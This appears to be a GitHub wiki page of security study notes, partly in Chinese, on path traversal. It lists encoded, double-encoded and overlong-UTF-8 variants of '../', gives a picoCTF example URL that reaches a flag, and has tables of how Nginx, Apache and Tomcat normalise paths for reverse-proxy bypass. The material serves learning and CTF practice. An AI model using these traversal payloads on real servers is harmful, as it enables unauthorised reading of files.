Path traversal - ianchen0119/About-Security GitHub Wiki
進入正題
Request variations
Encoding and double encoding:
%2e%2e%2f表示../%2e%2e/表示../..%2f表示../%2e%2e%5c表示..\%2e%2e\表示..\..%5c表示..\%252e%252e%255c表示..\..%255c表示..\
Percent encoding (aka URL encoding) Note that web containers perform one level of decoding on percent encoded values from forms and URLs.
..%c0%af represents ../ ..%c1%9c represents ..\
實例分析: Super Serial
Flag 在這:
http://mercury.picoctf.net:port/%2e%2e%2f/flag
Reverse Proxy Server Bypass
Reverse Proxy 用途
- Load Balancing
- Security Protection
- Rewrite HTTP Res/Req
Common reverse proxy
- Nginx
- HAProxy
- Varnish HTTP Cache
- Tr(ae)fik
- Apache
- Squid
- Pound
URL Passing
- Nginx
| Input | Normalized |
|---|---|
| /path/.. | / |
| // | / |
| /res/flag1/..//../flag2 | /flag2 |
| /PATH/..;/ | /PATH/..;/ |
- Apache
| Input | Normalized |
|---|---|
| /path/.. | / |
| // | // |
| /res/flag1/..//../flag2 | /res/flag2 |
| /PATH/..;/ | /PATH/..;/ |
- Tomcat
| Input | Normalized |
|---|---|
| /path/.. | / |
| // | / |
| /res/flag1/..//../flag2 | /flag2 |
| /PATH/..;/ | /PATH (support path parameters) |